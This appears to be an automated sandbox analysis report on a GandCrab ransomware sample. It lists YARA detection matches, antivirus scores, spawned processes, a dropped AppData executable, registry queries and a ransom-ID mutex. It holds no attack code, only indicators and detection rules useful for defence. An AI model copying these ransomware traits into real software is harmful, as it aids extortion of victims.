Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: Process Memory Space: wzltxa.exe PID: 1276, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 4616, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 6136, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 1356, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 6016, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 6128, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 2156, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: wzltxa.exe PID: 5248, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F691C20	0_2_0F691C20
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F691020	0_2_0F691020
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F698520	0_2_0F698520
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB1C20	11_2_0FBB1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB1020	11_2_0FBB1020
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB8520	11_2_0FBB8520
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB1C20	12_2_0FBB1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB1020	12_2_0FBB1020
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB8520	12_2_0FBB8520

Source: mPNVrHIpyt.exe	Virustotal: Detection: 84%
Source: mPNVrHIpyt.exe	Metadefender: Detection: 78%
Source: mPNVrHIpyt.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

File read: C:\Users\user\Desktop\mPNVrHIpyt.exe

Jump to behavior

Source: mPNVrHIpyt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mPNVrHIpyt.exe "C:\Users\user\Desktop\mPNVrHIpyt.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe "C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@17/1@16/1

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F697490 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

0_2_0F697490

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F697B70 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,

0_2_0F697B70

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=cd05fa18e84d425b

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts
